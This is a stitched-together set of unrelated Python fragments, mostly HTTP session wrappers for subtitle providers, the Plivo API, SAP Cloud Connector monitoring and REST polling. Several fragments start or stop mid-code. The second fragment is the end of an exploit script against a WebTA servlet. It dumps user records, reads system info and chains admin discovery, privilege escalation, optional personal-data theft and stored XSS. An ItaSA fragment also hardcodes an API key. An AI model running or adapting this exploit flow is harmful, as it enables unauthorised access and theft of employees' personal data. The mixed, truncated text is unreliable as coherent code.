class User(object): """ class for user credentials and sending and posting requests Attributes ---------- session : requests.Session username : str logged_in : bool Boolean standing for login state. True if logged in """ def __init__(self): super(User, self).__init__() self.session = Session() self.logged_in = False self.username = None def __del__(self): try: self.session.close() except TypeError: pass def login(self, username): """ Sets the attributes according to login """ self.username = username self.logged_in = True return self def logout(self): """ When logging out """ self.logged_in = False def check_login(self): """ Raise an error if user is not logged in """ if self.logged_in is False: raise AUTHError('%s is not logged in.' % self.username) def post(self, url, **kwargs): """ Wrap session post """ response = self.session.post(url, **kwargs) return response def get(self, url, **kwargs): """ Wrap session get """ response = self.session.get(url, **kwargs) return response @staticmethod def check_response(response): """ Check for errors in a REST call """ if response.ok: return response.json() else: response.raise_for_status()
pass count = i # does not include header print("[+] Complete. {} users written to file '{}'".format( count, filename)) print("[+] Sample Content:") with open(filename) as f: for n in range(2): print(",".join(f.readline().split("\t")), end="") def dumpSysInfo(): url = base_url + "/servlet/com.threeis.webta.H200mnuAdmin" data = {"selFunc": "about"} resp = web_req(url, data) html = resp.text data = re.findall(r'<INPUT VALUE\="(.*?)"', html, re.DOTALL) print("[+] " + data[0]) if __name__ == '__main__': print(banner) login() findAdmins() privesc() login() # login again because we need the refreshed perms after privesc dumpSysInfo() #stealPII() if xss: storeXSS() s.close()
class AssrtProvider(Provider): """Assrt Provider.""" languages = {Language(*l) for l in supported_languages} video_types = (Episode, Movie) def __init__(self, token=None): if not token: raise ConfigurationError('Token must be specified') self.token = token def initialize(self): self.session = Session() self.session.headers = { 'User-Agent': os.environ.get("SZ_USER_AGENT", "Sub-Zero/2") } def terminate(self): self.session.close() def query(self, languages, video): # query the server keywords = [] if isinstance(video, Movie): if video.title: # title = "".join(e for e in video.title if e.isalnum()) title = video.title keywords.append(title) if video.year: keywords.append(str(video.year)) elif isinstance(video, Episode): if video.series: # series = "".join(e for e in video.series if e.isalnum()) series = video.series keywords.append(series) if video.season and video.episode: keywords.append('S%02dE%02d' % (video.season, video.episode)) elif video.episode: keywords.append('E%02d' % video.episode) query = ' '.join(keywords) params = {'token': self.token, 'q': query, 'is_file': 1} logger.debug('Searching subtitles: GET /sub/search %r', params) res = self.session.get(server_url + '/sub/search', params=params, timeout=10) res.raise_for_status() result = res.json() if result['status'] != 0: logger.error('status error: %r', result['status']) return [] # parse the subtitles pattern = re.compile(r'lang(?P<code>\w+)') subtitles = [] for sub in result['sub']['subs']: if 'lang' not in sub: continue for key in sub['lang']['langlist'].keys(): match = pattern.match(key) try: language = Language.fromassrt(match.group('code')) output_language = search_language_in_list( language, languages) if output_language: subtitles.append( AssrtSubtitle(output_language, sub['id'], sub['videoname'], self.session, self.token)) except: pass return subtitles def list_subtitles(self, video, languages): return self.query(languages, video) def download_subtitle(self, subtitle): r = self.session.get(subtitle.download_link, timeout=10) r.raise_for_status() subtitle.content = fix_line_ending(r.content)
class OneP_Request: def __init__(self, host, https=True, httptimeout=15, headers={}, reuseconnection=False, log=None, curldebug=False): self.host = ('https://' + host) if https else ('http://' + host) self.https = https self.httptimeout = httptimeout self.headers = headers self.reuseconnection = reuseconnection self.session = Session() self.session.headers.update(self.headers) self.log = log self.curldebug = curldebug def request(self, method, path, body=None, headers={}, exception_fn=None, notimeout=False, verify=True): """Wraps HTTPConnection.request. On exception it calls exception_fn with the exception object. If exception_fn is None, it re-raises the exception. If notimeout is True, create a new connection (regardless of self.reuseconnection setting) that uses the global default timeout for sockets (usually None).""" # This needs to be done first because self.session may be None if not self.reuseconnection or notimeout: self.close() self.session = Session() allheaders = headers allheaders.update(self.session.headers) try: if self.curldebug: # output request as a curl call def escape(s): """escape single quotes for bash""" return s.replace("'", "'\\''") self.log.debug("curl '{1}{2}' -X {3} -m {4} {5} {6}".format( 'https' if self.https else 'http', self.host, path, method, self.httptimeout, ' '.join([ '-H \'{0}: {1}\''.format(escape(h), escape(allheaders[h])) for h in allheaders ]), '' if body is None else '-d \'' + escape(body) + '\'')) else: self.log.debug("%s %s\nHost: %s\nHeaders: %s" % (method, path, self.host, allheaders)) if body is not None: self.log.debug("Body: %s" % body) URI = self.host + path prepped = self.session.prepare_request( Request(method, URI, data=body, headers=headers)) response = self.session.send( prepped, verify=verify, timeout=None if notimeout else self.httptimeout) return response.text, response except Exception: self.close() ex = sys.exc_info()[1] if exception_fn is not None: exception_fn(ex) else: raise ex def close(self): """Closes any open connection. This should only need to be called if reuseconnection is set to True. Once it's closed, the connection may be reopened by making another API called.""" if self.session is not None: self.session.close() self.session = None
def _collect_sapcloudconnector(self): # # Uses monitoring API: # https://help.sap.com/viewer/cca91383641e40ffbe03bdc78f00f681/Cloud/en-US/f6e7a7bc6af345d2a334c2427a31d294.html # # Configuring : Make port 8443 available. add this to users.xml and restart SCC. # # <user username="******" password="******" roles="sccmonitoring"/> # cloud_connector_url = "{0}:{1}/".format(self.url, "8443").replace( "http://", "https://") self.log.debug( "{0}: Trying to connect to sapcloudconnector on url: {1}".format( self.host, cloud_connector_url)) health_url = cloud_connector_url + "exposed?action=ping" # # 1 second timeout to connect, 30 to read data. # status_code = 0 session = Session() session.auth = HTTPBasicAuth(self.user, self.password) session.timeout = (1, 30) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) try: health = session.get(cloud_connector_url) status_code = health.status_code except Exception: self.log.debug( "{0}: No SAP Cloud connector found on url: {1}".format( self.host, health_url)) status_code = 500 if status_code == 200: self.log.info( "{0}: Got health from cloud connector on url: {1}".format( self.host, health_url)) external_id = str(self._scc_external_id()) component_data = { "name": "SCC", "description": "SAP Cloud Connector", # "type": "SAP Cloud Connector", # "sid": "SCC", "host": self.host, # "system_number": "99", # "version": "v1", "domain": self.domain, "environment": self.stackstate_environment, "tags": self.tags # "labels": [] } self.log.debug("{0}: -----> component_data : {1}".format( self.host, component_data)) self.log.debug("{0}: -----> external_id : {1}".format( self.host, external_id)) self.component(external_id, "sap-cloud-connector", component_data) # define relation cloud connector --> host # is hosted on source_id = external_id target_id = self._host_external_id() relation_data = {} self.relation(source_id, target_id, "is hosted on", relation_data) # define scc status event self.event({ "timestamp": int(time.time()), "source_type_name": "SAP:scc state", # "source_type_name": "SAP:host instance", "msg_title": "SCC status update.", "msg_text": "", "host": self.host, "tags": ["instance_id:99", "status:sapcontrol-green"] }) # # Lists sub accounts to the SAP Cloud and connection tunnels # subaccount_url = cloud_connector_url + "api/monitoring/subaccounts" subaccount_reply = session.get(subaccount_url) if subaccount_reply.status_code == 200: reply = subaccount_reply.text.encode('utf-8') self.log.debug( "{0}: Sub accounts reply from cloud connector : {1}". format(self.host, reply)) subaccounts = json.loads(subaccount_reply.text) self.log.debug( "{0}: JSON sub accounts from cloud connector : {1}".format( self.host, subaccounts)) for subaccount in subaccounts["subaccounts"]: self.log.debug("{0}: subaccount: {1}".format( self.host, subaccount)) # define cloud connector component subaccount_name = str(subaccount.get("displayName")) # display name is not always setup if subaccount_name == "None": subaccount_name = str(subaccount.get("subaccount")) external_id = str( self._scc_subaccount_external_id( subaccount.get("subaccount"))) tunnel = subaccount.get("tunnel") component_data = { "name": subaccount_name, "description": str(subaccount.get("description")), "state": str(tunnel.get("state")), "connectedSince": str(tunnel.get("connectedSince")), "connections": str(tunnel.get("connections")), "user": str(tunnel.get("user")), "regionHost": str(subaccount.get("regionHost")), "subaccount": str(subaccount.get("subaccount")), "locationID": str(subaccount.get("locationID")), "layer": "SAP SCC Sub Accounts", "domain": self.domain, "environment": self.stackstate_environment, "host": self.host, "tags": self.tags # "labels": [] } self.log.debug("{0}: -----> component_data : {1}".format( self.host, component_data)) self.log.debug("{0}: -----> external_id : {1}".format( self.host, external_id)) self.component(external_id, "sap-scc-subaccount", component_data) # define relation cloud connector --> host # is hosted on source_id = external_id target_id = self._scc_external_id() relation_data = {} self.relation(source_id, target_id, "is_setup_on", relation_data) # define cloud connector status event tunnel_status = self._scc_subaccount_status( tunnel.get("state")) self.event({ "timestamp": int(time.time()), "source_type_name": "SAP:scc subaccount state", "msg_title": "SAP Cloud Connector '{0}' status update.".format( subaccount_name), "msg_text": "", "host": self.host, "tags": [ "status:{0}".format(tunnel_status), "subaccount_name:{0}".format(subaccount_name) ] }) else: if subaccount_reply.status_code == 400: msg = "{0}: SAP Cloud connector monitoring sub account page not " \ "supported in this version of SCC.".format(self.host) self.log.info(msg) else: status = subaccount_reply.status_code self.log.error( "{0}: No SAP Cloud connector sub account found. Status code: {1}" .format(self.host, status)) # # List backend SAP systems and virtual names. # backends_url = cloud_connector_url + "api/monitoring/connections/backends" backends_reply = session.get(backends_url) if backends_reply.status_code == 200: reply = backends_reply.text.encode('utf-8') self.log.debug( "{0}: Backends reply from cloud connector : {1}".format( self.host, reply)) backends = json.loads(backends_reply.text) self.log.info( "{0}: JSON backends from cloud connector : {1}".format( self.host, backends)) for subaccount in backends["subaccounts"]: # subaccount["regionHost"] # subaccount["subaccount"] # subaccount["locationID"] virtualbackend = str(subaccount.get("virtualBackend")) for backend in subaccount["backendConnections"]: external_id = self._scc_backend_external_id( subaccount["subaccount"], virtualbackend) component_data = { "virtualBackend": virtualbackend, "internalBackend": str(backend.get("internalBackend")), "protocol": str(backend.get("protocol")), "idle": str(backend.get("idle")), "active": str(backend.get("active")), "labels": [], "layer": "SAP SCC Back-ends", "domain": self.domain, "environment": self.stackstate_environment, "tags": self.tags } self.log.debug("{0}: ------> external_id : {1}".format( self.host, external_id)) self.component(external_id, "sap-cloud", component_data) # define relation cloud connector --> host # is hosted on source_id = external_id target_id = self._scc_subaccount_external_id( subaccount["subaccount"]) relation_data = {} self.relation(source_id, target_id, "is connected to", relation_data) self.event({ "timestamp": int(time.time()), "source_type_name": "SAP:cloud component state", "msg_title": "SAP Cloud Connector '{0}' status update.".format( backend["virtualBackend"]), "msg_text": "", "host": self.host, "tags": [ "active:{0}".format(backend["active"]), "idle:{0}".format(backend["idle"]) ] }) else: if backends_reply.status_code == 400: msg = "{0}: SAP Cloud connector monitoring backend page not supported " \ "in this version of SCC.".format(self.host) self.log.info(msg) else: status = backends_reply.status_code self.log.error( "{0}: No SAP Cloud connector backends found. Status code: {1}" .format(self.host, status)) if status_code == 401: msg = "{0}: Authentication failed, check your config.yml and SCC users.xml " \ "for corresponding username and password.".format(self.host) self.log.error(msg) session.close()
class BaseClient(object): def __init__(self, auth_id=None, auth_token=None, proxies=None, timeout=5): """ The Plivo API client. Deals with all the API requests to be made. """ self.base_uri = PLIVO_API_BASE_URI self.session = Session() self.session.headers.update({ 'User-Agent': get_user_agent(), 'Content-Type': 'application/json', 'Accept': 'application/json', }) self.session.auth = fetch_credentials(auth_id, auth_token) self.multipart_session = Session() self.multipart_session.headers.update({ 'User-Agent': get_user_agent(), 'Cache-Control': 'no-cache', }) self.multipart_session.auth = fetch_credentials(auth_id, auth_token) self.proxies = proxies self.timeout = timeout def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): self.session.close() self.multipart_session.close() def process_response(self, method, response, response_type=None, objects_type=None): """Processes the API response based on the status codes and method used to access the API """ try: response_json = response.json( object_hook= lambda x: ResponseObject(x) if isinstance(x, dict) else x) if response_type: r = response_type(self, response_json.__dict__) response_json = r if 'objects' in response_json and objects_type: response_json.objects = [ objects_type(self, obj.__dict__) for obj in response_json.objects ] except ValueError: response_json = None if response.status_code == 400: if response_json and 'error' in response_json: raise ValidationError(response_json.error) raise ValidationError( 'A parameter is missing or is invalid while accessing resource' 'at: {url}'.format(url=response.url)) if response.status_code == 401: if response_json and 'error' in response_json: raise AuthenticationError(response_json.error) raise AuthenticationError( 'Failed to authenticate while accessing resource at: ' '{url}'.format(url=response.url)) if response.status_code == 404: if response_json and 'error' in response_json: raise ResourceNotFoundError(response_json.error) raise ResourceNotFoundError( 'Resource not found at: {url}'.format(url=response.url)) if response.status_code == 405: if response_json and 'error' in response_json: raise InvalidRequestError(response_json.error) raise InvalidRequestError( 'HTTP method "{method}" not allowed to access resource at: ' '{url}'.format(method=method, url=response.url)) if response.status_code == 500: if response_json and 'error' in response_json: raise PlivoServerError(response_json.error) raise PlivoServerError( 'A server error occurred while accessing resource at: ' '{url}'.format(url=response.url)) if method == 'DELETE': if response.status_code != 204: raise PlivoRestError('Resource at {url} could not be ' 'deleted'.format(url=response.url)) elif response.status_code not in [200, 201, 202]: raise PlivoRestError( 'Received status code {status_code} for the HTTP method ' '"{method}"'.format( status_code=response.status_code, method=method)) return response_json def create_request(self, method, path=None, data=None): path = path or [] req = Request(method, '/'.join([self.base_uri, self.session.auth[0]] + list([str(p) for p in path])) + '/', **({ 'params': data } if method == 'GET' else { 'json': data })) return self.session.prepare_request(req) def create_multipart_request(self, method, path=None, data=None, files=None): path = path or [] data_args = {} if method == 'GET': data_args['params'] = data else: data_args['data'] = data if files and 'file' in files and files['file'] != '': data_args['files'] = files req = Request(method, '/'.join([self.base_uri, self.multipart_session.auth[0]] + list([str(p) for p in path])) + '/', **( data_args)) return self.multipart_session.prepare_request(req) def send_request(self, request, **kwargs): if 'session' in kwargs: session = kwargs['session'] del kwargs['session'] else: session = self.session return session.send( request, proxies=self.proxies, timeout=self.timeout, **kwargs) def request(self, method, path=None, data=None, response_type=None, objects_type=None, files=None, **kwargs): if files is not None: req = self.create_multipart_request(method, path, data, files) session = self.multipart_session else: req = self.create_request(method, path, data) session = self.session kwargs['session'] = session res = self.send_request(req, **kwargs) return self.process_response(method, res, response_type, objects_type)
class SubsSabBzProvider(Provider): """SubsSabBz Provider.""" languages = {Language('por', 'BR')} | {Language(l) for l in [ 'bul', 'eng' ]} def initialize(self): self.session = Session() self.session.headers['User-Agent'] = AGENT_LIST[randint(0, len(AGENT_LIST) - 1)] self.session.headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" self.session.headers["Accept-Language"] = "en-US,en;q=0.5" self.session.headers["Accept-Encoding"] = "gzip, deflate, br" self.session.headers["DNT"] = "1" self.session.headers["Connection"] = "keep-alive" self.session.headers["Upgrade-Insecure-Requests"] = "1" self.session.headers["Cache-Control"] = "max-age=0" def terminate(self): self.session.close() def query(self, language, video): subtitles = [] isEpisode = isinstance(video, Episode) params = { 'act': 'search', 'movie': '', 'select-language': '2', 'upldr': '', 'yr': '', 'release': '' } if isEpisode: params['movie'] = "%s %02d %02d" % (sanitize(video.series), video.season, video.episode) else: params['yr'] = video.year params['movie'] = (video.title) if language == 'en' or language == 'eng': params['select-language'] = 1 logger.info('Searching subtitle %r', params) response = self.session.post('http://subs.sab.bz/index.php?', params=params, allow_redirects=False, timeout=10, headers={ 'Referer': 'http://subs.sab.bz/', }) response.raise_for_status() if response.status_code != 200: logger.debug('No subtitles found') return subtitles soup = BeautifulSoup(response.content, 'html.parser') rows = soup.findAll('tr', {'class': 'subs-row'}) # Search on first 10 rows only for row in rows[:10]: a_element_wrapper = row.find('td', { 'class': 'c2field' }) if a_element_wrapper: element = row.find('a') if element: link = element.get('href') logger.info('Found subtitle link %r', link) subtitles = subtitles + self.download_archive_and_add_subtitle_files(link, language, video) return subtitles def list_subtitles(self, video, languages): return [s for l in languages for s in self.query(l, video)] def download_subtitle(self, subtitle): pass def process_archive_subtitle_files(self, archiveStream, language, video): subtitles = [] type = 'episode' if isinstance(video, Episode) else 'movie' for file_name in archiveStream.namelist(): if file_name.lower().endswith(('.srt', '.sub')): logger.info('Found subtitle file %r', file_name) subtitle = SubsSabBzSubtitle(language, file_name, type) subtitle.content = archiveStream.read(file_name) subtitles.append(subtitle) return subtitles def download_archive_and_add_subtitle_files(self, link, language, video ): logger.info('Downloading subtitle %r', link) request = self.session.get(link, headers={ 'Referer': 'http://subs.sab.bz/index.php?' }) request.raise_for_status() archive_stream = io.BytesIO(request.content) if is_rarfile(archive_stream): return self.process_archive_subtitle_files( RarFile(archive_stream), language, video ) elif is_zipfile(archive_stream): return self.process_archive_subtitle_files( ZipFile(archive_stream), language, video ) else: raise ValueError('Not a valid archive')
class RestDataMod: """Class for handling the data retrieval.""" def __init__( self, method, resource, auth, headers, data, verify_ssl, timeout=DEFAULT_TIMEOUT, proxy_url=None, ): """Initialize the data object.""" self._method = method self._resource = resource self._auth = auth self._headers = headers self._request_data = data self._verify_ssl = verify_ssl self._timeout = timeout self._http_session = Session() if proxy_url is not None: self._proxies = {"http": proxy_url, "https": proxy_url} else: self._proxies = None self.data = None self.headers = None def set_payload(self, payload): """Set payload.""" self._request_data = payload def __del__(self): """Destroy the http session on destroy.""" self._http_session.close() def set_url(self, url): """Set url.""" self._resource = url def update(self): """Get the latest data from REST service with provided method.""" _LOGGER.debug("Updating from %s", self._resource) headers = {} if self._headers: for header_name, header_template in self._headers.items(): headers[header_name] = header_template.render() try: response = self._http_session.request( self._method, self._resource, headers=headers, auth=self._auth, data=self._request_data, timeout=self._timeout, verify=self._verify_ssl, proxies=self._proxies, ) self.data = response.text self.headers = response.headers except requests.exceptions.RequestException as ex: _LOGGER.warning("Error fetching data: %s failed with %s", self._resource, ex) self.data = None self.headers = None except Exception as err: _LOGGER.warning("Unknown error: %s", err) self.data = None self.headers = None
class Addic7edProvider(Provider): """Addic7ed Provider.""" languages = {Language('por', 'BR')} | { Language(l) for l in [ 'ara', 'aze', 'ben', 'bos', 'bul', 'cat', 'ces', 'dan', 'deu', 'ell', 'eng', 'eus', 'fas', 'fin', 'fra', 'glg', 'heb', 'hrv', 'hun', 'hye', 'ind', 'ita', 'jpn', 'kor', 'mkd', 'msa', 'nld', 'nor', 'pol', 'por', 'ron', 'rus', 'slk', 'slv', 'spa', 'sqi', 'srp', 'swe', 'tha', 'tur', 'ukr', 'vie', 'zho' ] } video_types = (Episode, ) server_url = 'http://www.addic7ed.com/' subtitle_class = Addic7edSubtitle def __init__(self, username=None, password=None, random_user_agent=False): if any((username, password)) and not all((username, password)): raise ConfigurationError('Username and password must be specified') self.username = username self.password = password self.logged_in = False self.session = None self.random_user_agent = random_user_agent def initialize(self): self.session = Session() self.session.headers['User-Agent'] = self._get_user_agent() # login if self.username and self.password: logger.info('Logging in') data = { 'username': self.username, 'password': self.password, 'Submit': 'Log in' } r = self.session.post(self.server_url + 'dologin.php', data, allow_redirects=False, timeout=10) if r.status_code != 302: raise AuthenticationError(self.username) logger.debug('Logged in') self.logged_in = True def terminate(self): # logout if self.logged_in: logger.info('Logging out') r = self.session.get(self.server_url + 'logout.php', timeout=10) r.raise_for_status() logger.debug('Logged out') self.logged_in = False self.session.close() def _get_user_agent(self): user_agent = 'Subliminal/%s' % __short_version__ if self.random_user_agent: from autosubliminal.providers.useragents import RANDOM_USER_AGENTS user_agent = RANDOM_USER_AGENTS[random.randint( 0, len(RANDOM_USER_AGENTS) - 1)] logger.debug('Using random user agent: %s', user_agent) return user_agent @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _get_show_ids(self): """Get the ``dict`` of show ids per series by querying the `shows.php` page. :return: show id per series, lower case and without quotes. :rtype: dict """ # get the show page logger.info('Getting show ids') r = self.session.get(self.server_url + 'shows.php', timeout=10) r.raise_for_status() # LXML parser seems to fail when parsing Addic7ed.com HTML markup. # Last known version to work properly is 3.6.4 (next version, 3.7.0, fails) # Assuming the site's markup is bad, and stripping it down to only contain what's needed. show_cells = re.findall(show_cells_re, r.content) if show_cells: soup = ParserBeautifulSoup(b''.join(show_cells), ['lxml', 'html.parser']) else: # If RegEx fails, fall back to original r.content and use 'html.parser' soup = ParserBeautifulSoup(r.content, ['html.parser']) # populate the show ids show_ids = {} for show in soup.select('td.version > h3 > a[href^="/show/"]'): show_ids[sanitize(show.text)] = int(show['href'][6:]) logger.debug('Found %d show ids', len(show_ids)) return show_ids @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _search_show_id(self, series, year=None): """Search the show id from the `series` and `year`. :param str series: series of the episode. :param year: year of the series, if any. :type year: int :return: the show id, if found. :rtype: int """ # addic7ed doesn't support search with quotes series = series.replace('\'', ' ') # build the params series_year = '%s %d' % (series, year) if year is not None else series params = {'search': series_year, 'Submit': 'Search'} # make the search logger.info('Searching show ids with %r', params) r = self.session.get(self.server_url + 'search.php', params=params, timeout=10) r.raise_for_status() soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) # get the suggestion suggestion = soup.select('span.titulo > a[href^="/show/"]') if not suggestion: logger.warning('Show id not found: no suggestion') return None if not sanitize(suggestion[0].i.text.replace( '\'', ' ')) == sanitize(series_year): logger.warning('Show id not found: suggestion does not match') return None show_id = int(suggestion[0]['href'][6:]) logger.debug('Found show id %d', show_id) return show_id def get_show_id(self, series, year=None, country_code=None): """Get the best matching show id for `series`, `year` and `country_code`. First search in the result of :meth:`_get_show_ids` and fallback on a search with :meth:`_search_show_id`. :param str series: series of the episode. :param year: year of the series, if any. :type year: int :param country_code: country code of the series, if any. :type country_code: str :return: the show id, if found. :rtype: int """ series_sanitized = sanitize(series).lower() show_ids = self._get_show_ids() show_id = None # attempt with country if not show_id and country_code: logger.debug('Getting show id with country') show_id = show_ids.get('%s %s' % (series_sanitized, country_code.lower())) # attempt with year if not show_id and year: logger.debug('Getting show id with year') show_id = show_ids.get('%s %d' % (series_sanitized, year)) # attempt clean if not show_id: logger.debug('Getting show id') show_id = show_ids.get(series_sanitized) # search as last resort if not show_id: logger.warning('Series not found in show ids') show_id = self._search_show_id(series) return show_id def query(self, series, season, year=None, country=None): # get the show id show_id = self.get_show_id(series, year, country) if show_id is None: logger.error('No show id found for %r (%r)', series, { 'year': year, 'country': country }) return [] # get the page of the season of the show logger.info('Getting the page of show id %d, season %d', show_id, season) r = self.session.get(self.server_url + 'show/%d' % show_id, params={'season': season}, timeout=10) r.raise_for_status() if not r.content: # Provider returns a status of 304 Not Modified with an empty content # raise_for_status won't raise exception for that status code logger.debug('No data returned from provider') return [] soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) # loop over subtitle rows match = series_year_re.match( soup.select('#header font')[0].text.strip()[:-10]) series = match.group('series') year = int(match.group('year')) if match.group('year') else None subtitles = [] for row in soup.select('tr.epeven'): cells = row('td') # ignore incomplete subtitles status = cells[5].text if status != 'Completed': logger.debug('Ignoring subtitle with status %s', status) continue # read the item language = Language.fromaddic7ed(cells[3].text) hearing_impaired = bool(cells[6].text) page_link = self.server_url + cells[2].a['href'][1:] season = int(cells[0].text) episode = int(cells[1].text) title = cells[2].text version = cells[4].text download_link = cells[9].a['href'][1:] subtitle = self.subtitle_class(language, hearing_impaired, page_link, series, season, episode, title, year, version, download_link) logger.debug('Found subtitle %r', subtitle) subtitles.append(subtitle) return subtitles def list_subtitles(self, video, languages): titles = [video.series] + video.alternative_series for title in titles: subtitles = [ s for s in self.query(title, video.season, video.year) if s.language in languages and s.episode == video.episode ] if subtitles: return subtitles return [] def download_subtitle(self, subtitle): # download the subtitle logger.info('Downloading subtitle %r', subtitle) r = self.session.get(self.server_url + subtitle.download_link, headers={'Referer': subtitle.page_link}, timeout=10) r.raise_for_status() if not r.content: # Provider returns a status of 304 Not Modified with an empty content # raise_for_status won't raise exception for that status code logger.debug( 'Unable to download subtitle. No data returned from provider') return # detect download limit exceeded if r.headers['Content-Type'] == 'text/html': raise DownloadLimitExceeded subtitle.content = fix_line_ending(r.content)
class ItaSAProvider(Provider): languages = {Language('ita')} video_types = (Episode,) server_url = 'https://api.italiansubs.net/api/rest/' apikey = 'd86ad6ec041b334fac1e512174ee04d5' def __init__(self, username=None, password=None): if username is not None and password is None or username is None and password is not None: raise ConfigurationError('Username and password must be specified') self.username = username self.password = password self.logged_in = False self.login_itasa = False self.session = None self.auth_code = None def initialize(self): self.session = Session() self.session.headers['User-Agent'] = 'Subliminal/{}'.format(__version__) # login if self.username is not None and self.password is not None: logger.info('Logging in') params = { 'username': self.username, 'password': self.password, 'apikey': self.apikey } r = self.session.get(self.server_url + 'users/login', params=params, timeout=10) root = etree.fromstring(r.content) if root.find('status').text == 'fail': raise AuthenticationError(root.find('error/message').text) self.auth_code = root.find('data/user/authcode').text data = { 'username': self.username, 'passwd': self.password, 'remember': 'yes', 'option': 'com_user', 'task': 'login', 'silent': 'true' } r = self.session.post('http://www.italiansubs.net/index.php', data=data, timeout=30) r.raise_for_status() self.logged_in = True def terminate(self): self.session.close() self.logged_in = False @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _get_show_ids(self): """Get the ``dict`` of show ids per series by querying the `shows` page. :return: show id per series, lower case and without quotes. :rtype: dict """ # get the show page logger.info('Getting show ids') params = {'apikey': self.apikey} r = self.session.get(self.server_url + 'shows', timeout=10, params=params) r.raise_for_status() root = etree.fromstring(r.content) # populate the show ids show_ids = {} for show in root.findall('data/shows/show'): if show.find('name').text is None: # pragma: no cover continue show_ids[sanitize(show.find('name').text).lower()] = int(show.find('id').text) logger.debug('Found %d show ids', len(show_ids)) return show_ids @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _search_show_id(self, series): """Search the show id from the `series` :param str series: series of the episode. :return: the show id, if found. :rtype: int or None """ # build the param params = {'apikey': self.apikey, 'q': series} # make the search logger.info('Searching show ids with %r', params) r = self.session.get(self.server_url + 'shows/search', params=params, timeout=10) r.raise_for_status() root = etree.fromstring(r.content) if int(root.find('data/count').text) == 0: logger.warning('Show id not found: no suggestion') return None # Looking for show in first page for show in root.findall('data/shows/show'): if sanitize(show.find('name').text).lower() == sanitize(series.lower()): show_id = int(show.find('id').text) logger.debug('Found show id %d', show_id) return show_id # Not in the first page of result try next (if any) next_page = root.find('data/next') while next_page.text is not None: # pragma: no cover r = self.session.get(next_page.text, timeout=10) r.raise_for_status() root = etree.fromstring(r.content) logger.info('Loading suggestion page %r', root.find('data/page').text) # Looking for show in following pages for show in root.findall('data/shows/show'): if sanitize(show.find('name').text).lower() == sanitize(series.lower()): show_id = int(show.find('id').text) logger.debug('Found show id %d', show_id) return show_id next_page = root.find('data/next') # No matches found logger.warning('Show id not found: suggestions does not match') return None def get_show_id(self, series, country_code=None): """Get the best matching show id for `series`. First search in the result of :meth:`_get_show_ids` and fallback on a search with :meth:`_search_show_id` :param str series: series of the episode. :param str country_code: the country in which teh show is aired. :return: the show id, if found. :rtype: int or None """ series_sanitized = sanitize(series).lower() show_ids = self._get_show_ids() show_id = None # attempt with country if not show_id and country_code: logger.debug('Getting show id with country') show_id = show_ids.get('{0} {1}'.format(series_sanitized, country_code.lower())) # attempt clean if not show_id: logger.debug('Getting show id') show_id = show_ids.get(series_sanitized) # search as last resort if not show_id: logger.warning('Series not found in show ids') show_id = self._search_show_id(series) return show_id @region.cache_on_arguments(expiration_time=EPISODE_EXPIRATION_TIME) def _download_zip(self, sub_id): # download the subtitle logger.info('Downloading subtitle %r', sub_id) params = { 'authcode': self.auth_code, 'apikey': self.apikey, 'subtitle_id': sub_id } r = self.session.get(self.server_url + 'subtitles/download', params=params, timeout=30) r.raise_for_status() return r.content def _get_season_subtitles(self, show_id, season, sub_format): params = { 'apikey': self.apikey, 'show_id': show_id, 'q': 'Stagione %{}'.format(season), 'version': sub_format } r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30) r.raise_for_status() root = etree.fromstring(r.content) if int(root.find('data/count').text) == 0: logger.warning('Subtitles for season not found, try with rip suffix') params['version'] = sub_format + 'rip' r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30) r.raise_for_status() root = etree.fromstring(r.content) if int(root.find('data/count').text) == 0: logger.warning('Subtitles for season not found') return [] subs = [] # Looking for subtitles in first page season_re = re.compile('.*?stagione 0*?{}.*'.format(season)) for subtitle in root.findall('data/subtitles/subtitle'): if season_re.match(subtitle.find('name').text.lower()): logger.debug('Found season zip id %d - %r - %r', int(subtitle.find('id').text), subtitle.find('name').text, subtitle.find('version').text) content = self._download_zip(int(subtitle.find('id').text)) if not is_zipfile(io.BytesIO(content)): # pragma: no cover if 'limite di download' in content: raise TooManyRequests() else: raise ConfigurationError('Not a zip file: {!r}'.format(content)) with ZipFile(io.BytesIO(content)) as zf: episode_re = re.compile('s(\d{1,2})e(\d{1,2})') for index, name in enumerate(zf.namelist()): match = episode_re.search(name) if not match: # pragma: no cover logger.debug('Cannot decode subtitle %r', name) else: sub = ItaSASubtitle( int(subtitle.find('id').text), subtitle.find('show_name').text, int(match.group(1)), int(match.group(2)), None, None, None, name) sub.content = fix_line_ending(zf.read(name)) subs.append(sub) return subs def query(self, series, season, episode, video_format, resolution, country=None): # To make queries you need to be logged in if not self.logged_in: # pragma: no cover raise ConfigurationError('Cannot query if not logged in') # get the show id show_id = self.get_show_id(series, country) if show_id is None: logger.error('No show id found for %r ', series) return [] # get the page of the season of the show logger.info('Getting the subtitle of show id %d, season %d episode %d, format %r', show_id, season, episode, video_format) subtitles = [] # Default format is SDTV if not video_format or video_format.lower() == 'hdtv': if resolution in ('1080i', '1080p', '720p'): sub_format = resolution else: sub_format = 'normale' else: sub_format = video_format.lower() # Look for year params = { 'apikey': self.apikey } r = self.session.get(self.server_url + 'shows/' + str(show_id), params=params, timeout=30) r.raise_for_status() root = etree.fromstring(r.content) year = root.find('data/show/started').text if year: year = int(year.split('-', 1)[0]) tvdb_id = root.find('data/show/id_tvdb').text if tvdb_id: tvdb_id = int(tvdb_id) params = { 'apikey': self.apikey, 'show_id': show_id, 'q': '{0}x{1:02}'.format(season, episode), 'version': sub_format } r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30) r.raise_for_status() root = etree.fromstring(r.content) if int(root.find('data/count').text) == 0: logger.warning('Subtitles not found, try with rip suffix') params['version'] = sub_format + 'rip' r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30) r.raise_for_status() root = etree.fromstring(r.content) if int(root.find('data/count').text) == 0: logger.warning('Subtitles not found, go season mode') # If no subtitle are found for single episode try to download all season zip subs = self._get_season_subtitles(show_id, season, sub_format) if subs: for subtitle in subs: subtitle.format 